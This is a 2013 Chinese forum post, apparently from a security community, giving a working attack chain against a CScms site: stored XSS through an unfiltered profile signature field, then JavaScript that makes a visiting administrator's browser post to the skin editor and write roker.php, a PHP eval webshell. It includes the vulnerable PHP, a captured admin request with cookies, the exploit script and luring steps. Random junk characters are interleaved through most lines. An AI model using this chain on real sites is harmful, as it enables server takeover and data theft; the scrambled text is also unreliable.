|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题, }: a; L: x# N4 ]5 C# n- J
官网已经修补了,所以重新下了源码
1 S/ j& v3 ^( _# O" m9 j8 F因为 后台登入 还需要认证码 所以 注入就没看了。( _0 \, q. Y+ p0 H4 f
存在 xss4 D( I5 b. T/ f" A/ I, F
漏洞文件 user/member/skin_edit.php+ ]0 X) K* L1 E! N( d Y3 I) _
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
7 L! F) ?; p7 ~4 j
' e4 {0 A" B6 ~" \2 |. J) E+ q</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
) ]/ M- o) S0 I. I( W; c: ^* `( M & A9 j% @$ F: _2 F
</textarea></td></tr>
3 }1 l! k* |- z . z+ r9 ^5 j3 Q& b( D R* S
user/do.php 7 `9 Q, {9 d8 \; o
5 `% Q; Q k( G3 A% y
6 T2 n' Q1 j$ T1 z- `if($op=='zl'){ //资料
. A+ H A9 m8 H 6 p8 f% z: [$ K. K' a0 g( s. l
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
E. p9 {8 o4 Q, |: n/ R3 I exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));3 E2 V, c8 u$ o C6 a3 {& u
! Z5 H- v" I( \! F% W/ c: l
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', g' M& ~% J8 j: ~. ?9 @* w) s0 Z
) D. g1 k! y" g) M! H9 D6 U3 E CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'" F5 w b4 e2 F( f5 u
where CS_Name='".$cscms_name."'";+ m5 D1 y c/ {2 [+ p2 J( {
3 z( n, Q$ a7 o# v6 E/ w' u& l
if($db->query($sql)){
6 w! U' y- s' u6 |4 x $ v( @8 l/ @" x
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));( Y0 v- U1 A: t+ G: M9 j9 A4 z
9 t* T1 \* \/ f+ R: s: _1 {) P }else{
4 F# H& C9 ^3 r; g$ [ 4 I4 B8 F( W7 a+ E1 a9 [1 ~
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
( x$ F- S7 B; M( k' z: a ; p. }& n6 Z$ G# t) {$ Z
}
- {& T1 Z d1 |2 A9 Y$ |; i/ L
' a# y- k, p- U8 G" g# t% I& X
" L6 `- }& d, r8 ^" l2 w* }没有 过滤导致xss产生。% G! e9 @' Q4 M, L0 N, @7 o8 o
后台 看了下 很奇葩的是可以写任意格式文件。。, ]4 v# R2 U, h) U1 Q
抓包。。
8 h5 r7 [- a7 Z3 U4 m X' R/ ?1 E1 d3 l( c# a3 Y! Z6 P9 w$ A U! D8 @3 |
0 }3 t, t: n2 ]* s" R4 a
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
: U6 ]* I, j% M# G m5 N
b1 P+ `" K5 lAccept: text/html, application/xhtml+xml, */*
5 t) h& |- m$ ^, Y0 } 7 I9 q4 \9 \- O8 f4 }6 O5 H4 r: I
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Z3 U; g% C1 P* { ) ~ {# f; s% Z( H3 S* L' h
Accept-Language: zh-CN
0 `) F" @# k) a' Z* n5 T O3 _( S ) R! p6 e. ^, b. a
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)7 y, K% w% b% y1 p3 K/ n- d
4 \6 W! P* }7 ?2 }# h4 K/ l$ C$ n: F
Content-Type: application/x-www-form-urlencoded
" e2 l6 e3 Y7 X! ~/ [2 h$ b n7 O2 H R7 l8 u
Accept-Encoding: gzip, deflate; ]% P1 e+ C$ Z. Y& B
- ^7 R T& N; n1 y/ uHost: 127.0.0.1
, G: c3 u+ t, @# @ " y) \1 k! ?0 u
Content-Length: 389 [# c8 s# V2 L1 a3 R8 z3 j
( S) G. x* b5 R, s0 Q1 eDNT: 1& ~4 f4 F. P, A) a% z7 J& u
3 b7 |" }: I; b( ^; g
Connection: Keep-Alive* o2 K/ t- ^& c; ~2 X. L
0 H- T2 c* w6 A2 P" Q' HCache-Control: no-cache+ {: z* `* z2 ?/ B% G
1 N. T F% r. m" y4 _Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
, c: W( Y g! h& E, B& f, W
, G' h: p' e0 e3 a6 \, V( O) E; Z+ @, O& Y
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
. U6 p2 a; r" x$ T1 Z, @
% V/ F# \) o0 E1 `: g' j( z7 _& {9 b# `! r S
6 o8 O* _) k) |于是 构造js如下。
1 n; }8 M) {& T
& o; U* H% E) t7 h8 W本帖隐藏的内容<script> ' S# U# b! m5 Q2 v
thisTHost = top.location.hostname;! w+ v! q1 H4 R) ]! I
, ]; V2 D0 r% d( G2 g
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";7 Z0 f: R8 T; Y, x6 H7 S& t! X1 |
- [/ G8 R d4 ]1 T9 p. Cfunction PostSubmit(url, data, msg) {
. J( M/ [8 P; |. m, ? var postUrl = url;
+ c, U9 }2 z8 L$ \2 a3 q/ e
! R T- ?/ I2 Q# H4 m$ h2 l var postData = data;
) _ C* C( Y5 d var msgData = msg; 9 _4 U3 u) Y( x
var ExportForm = document.createElement("FORM"); 4 T3 o. M! Q& j2 s- p
document.body.appendChild(ExportForm); - ]1 p( L& R0 U. P. Y* |' j' |. _
ExportForm.method = "POST"; 8 |+ r4 {" ?2 Q" N: i Z' x1 b q
var newElement = document.createElement("input"); 4 o7 |. N& {7 c! d1 H. L. ?
newElement.setAttribute("name", "name");
/ H6 C% X# n" c newElement.setAttribute("type", "hidden"); ; w9 I" I; \. Z+ }" `
var newElement2 = document.createElement("input");
* T0 u- q' |8 k5 A- D' D newElement2.setAttribute("name", "content");
) D. K) S8 T* z8 [! a* G/ p7 M newElement2.setAttribute("type", "hidden"); / b* W# K1 r' z5 X
ExportForm.appendChild(newElement);
' A& k* A7 t5 I$ A# p5 q8 y ExportForm.appendChild(newElement2); 8 j$ Z6 Z M7 u. s' U6 f. ?
newElement.value = postData; 6 `2 l$ r2 ?$ P2 S4 i4 X
newElement2.value = msgData; % R, h. d$ F2 w/ e. y9 U
ExportForm.action = postUrl;
, J) y# S0 h4 {+ M ExportForm.submit();
2 `0 |$ Z, G5 o7 I- P};
0 u, @7 }& h! V) b& f ( z$ h m7 G4 N" X: l
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");$ Z$ w8 \$ P- L% |0 n& a" z
8 e; L2 e/ S, Z0 m/ F8 i</script>6 `+ H* B4 ]/ x% E
4 ], X$ ^' E. Q. ~# I# F
/ c% p8 Y0 Y& h$ o( M3 K& e* l
; e+ v+ s$ R {, lhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
+ G, }! Z% |7 b0 K( u% {用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)% ~( J/ ^# ?$ V2 f( D
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
$ V: f/ A: J4 E3 A2 |3 O, _# a) W
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对